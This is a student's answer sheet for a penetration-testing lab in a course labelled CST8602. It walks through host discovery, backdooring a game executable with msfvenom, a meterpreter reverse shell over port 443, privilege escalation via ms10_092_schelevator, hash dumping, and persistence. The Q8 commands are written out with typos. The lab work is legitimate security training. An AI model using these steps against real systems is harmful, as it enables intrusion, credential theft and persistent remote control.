CST8602 Lab #5 Liban Abdi

Q1 - Fully document the output of all scans performed on the victim.

 Determine which IP address you think is the victim
10.20.0.136
 Explain why you think it is that IP address.
I used netdiscover with the option -r 10.20.0.0/24
it will display all device that are on the network that are sending out arp requests
we got three results .1 , .254 and .136
.1 is the gateway , .254 is the dhcp server and that leaves us with .136 which is the
windows 7

Q2 - Based on what NMap has found about the victim, how valuable would it be to do an
unauthenticated scan of the workstation IP with a vulnerability scanner such as
Nessus/NeXpose/OpenVAS? Explain your reasoning.

Not much valuable, nmap already gave us the running services and their version which would
be enough to search if there is vulnerabilities out there

V 1.4 November 7, 2018 Page 1 of 9

 CST8602 Lab #5 Liban Abdi

Q3 - What is the size (in bytes) of the backdoored game file? = 182784
What is the size (in bytes) of the original game file? = 118784

Q4 - Describe in a way that a company CEO could understand what the above msfvenom
command does.

It creates a payload that will allow an attack to gain access to the system, it appends that
payload to an exe file in this case its a game and then it encrypts it to make it undetectable to
antivirus

In addition, describe this in a way that a CEO could understand specifically what
“windows/meterpreter/reverse_tcp” is and what it does.

Its a payload that if installed in a victims machine will try to send out connection probes to the
attackers machine, it has the ip address and port number to initialize the connection

V 1.4 November 7, 2018 Page 2 of 9

 CST8602 Lab #5 Liban Abdi
Q5 - Explain why we are using port 443.

If the victim has firewall with egress filtering then important ports like 443 which is https will be
most probably be open
What other ports would probably work just as well and why?

Ports 53, 22 etc... most firewall egress filtering will allow these well known ports

Q6 - What is the difference between the reverse_tcp stager and the reverse_http stager?

In reverse_http communication between payload and metasploit takes place over http protocol
so its less suspicious

reverse_tcp creates a regular tcp connection

Under what circumstances would using the reverse_http stager be a better choice?

When you know there victims machine is using egress filtering on their firewall

Q7 - Describe two other ways that might work to get our malware onto a user’s workstation other
than via email or web. Assume social engineering may be required.

Having physical access to the system

giving the victim malicious USB

Q8 - Privilege escalation: Using only the meterpreter shell, attempt to escalate your privileges to
an Administrator or SYSTEM. Show how you did this and proof that it worked.

Ans= I used my own payload

msfv -p windows/x64/meterpreter/reverse_tcp LHOST=10.20.0.133 LPORT=9393 -f exe -a

x64 --platform windows

msfconfole

use multi/handler

use exploit/windows/x64/meterpreter/reverse_tcp

set LHOST=10.20.0.134

set LPORT=443

exploit

after getting a session

background the session

V 1.4 November 7, 2018 Page 3 of 9

 CST8602 Lab #5 Liban Abdi
search for types of exploit that might work on this session

use post/multi/recon/local_exploit_sugester

then we find ms10_092_schelevator

use exploit/windows/local/ms10_092_schelevator

set the options

exploit

V 1.4 November 7, 2018 Page 4 of 9

 CST8602 Lab #5 Liban Abdi
Q9 - Reconnaissance: Using only the meterpreter shell, obtain and document all of the following
information from the victim workstation. You must show the information you obtained and
also show the commands you typed in meterpreter to get the information:

Sysinfo

V 1.4 November 7, 2018 Page 5 of 9

 CST8602 Lab #5 Liban Abdi
TaskList

Users and HASHDUMP

V 1.4 November 7, 2018 Page 6 of 9

 CST8602 Lab #5 Liban Abdi
Screenshot

Q10 - Pillaging: Using only the meterpreter shell, search user directories for potentially sensitive
documents and images. Download them to the lab5-loot directory. Show the contents of the

V 1.4 November 7, 2018 Page 7 of 9

 CST8602 Lab #5 Liban Abdi
files you found, the full path of where you found them, and a description of what they
appear to be.

Q11 - Persistence: Using only the meterpreter shell, install meterpreter as a service so that it
persistently tries to connect back to your Kali VM on port 443 every 60 seconds.

Prove that it works by rebooting the Windows workstation and setting up another multi/handler
on Kali to demonstrate that you are able to get another meterpreter shell when it restarts.

V 1.4 November 7, 2018 Page 8 of 9

 CST8602 Lab #5 Liban Abdi
Q12 - Recommendations: What are two additional safeguards the client could implement to protect
themselves against this type of malware attack?

https://www.virustotal.com/#/home/url to check for suspicious link

running uptodate antivirus

Which of the two would be the most effective and why?

Running uptodate antivirus, in our case the windows 7 didn't have a running antivirus, even if
the url check fails to detect the malicious file you should have second defence that will detect
suspicious activities when the file is run and that is done by the antivirus

V 1.4 November 7, 2018 Page 9 of 9